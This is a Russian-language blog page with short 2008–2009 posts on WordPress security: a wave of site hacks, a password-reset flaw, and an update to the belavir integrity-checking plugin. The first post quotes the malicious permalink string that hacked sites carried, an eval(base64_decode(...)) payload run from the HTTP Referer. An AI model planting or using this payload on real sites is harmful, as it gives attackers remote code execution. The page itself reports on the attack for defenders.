6 сентября 2009
Намедни случилась большая паника среди wordpress-сообщества: злобные хакеры поломали кучу сайтов на Wordpress. Вскрытие показало, что в движке чуть ли не с рождения имеется большая дыра. Удивительно, что раньше никто на это не обратил внимания. Видимо, из-за отсутствия явно выраженных признаков взлома или не столь массового характера. Проявился взлом в виде “аппендиксов” у урлов примерно такого вида: /%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Папа, что это было?
13 августа 2009
Намедни была обнаружена уязвимость WordPress, позволяющая злоумышленнику запросить смену пароля пользователя, у которого в базе нет ключа активации (не было запросов “напоминания” пароля). Чаще всего таким пользователем оказывался admin - первый по списку. Уязвимость не критичная, т.к. пароль менялся на случайный, сгенерированный WP, и отправлялся на почту жертве. (далее…)
27 июня 2008
По просьбам трудящихся в плагин belavir внесено небольшое, но существенное изменение. Теперь священное право нажать на кнопочку “Сбросить/обновить хэш файлов” имеет только юзер, обладающий правами на редактирование шаблона. Остальные будут только видеть сообщение о наличии или отсутствии изменений. Скачать плагин. (далее…)
